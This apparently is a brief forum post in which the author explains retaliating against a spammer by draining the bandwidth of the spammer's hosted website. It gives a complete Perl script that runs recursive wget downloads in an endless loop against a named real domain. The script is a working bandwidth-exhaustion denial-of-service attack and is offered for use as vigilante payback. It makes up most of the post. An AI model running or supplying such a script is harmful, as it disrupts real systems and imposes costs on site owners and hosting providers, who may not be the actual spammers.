ok, reputation suicide. I know, but what can I do?
First I check what is the spammer hosting (dig sitename) then I go to the hosting and see how much they charge for bandwidth... having a DSL with no limits it is really handy.
then it is just a matter of using the friendly.pl bellow
#!/usr/bin/perl -w
$SIG{HUP} = \&end_it_all;
$SIG{TERM} = \&end_it_all;
$SIG{INT} = \&end_it_all;
$SIG{QUIT} = \&end_it_all;
$count = 0;
$host = "www.BIOPROTEC.COM.BR";
while (1)
{
$exit = system("wget -r -l100 -U \"Stop sending me SPAM! This is the o
+nly way to make you undestand.\" http://$host");
$count ++;
if ($exit)
{
&end_it_all;
}
}
sub end_it_all()
{
print "\n did some funny things some $count times... naughty, naught
+y\n";
exit(0);
}
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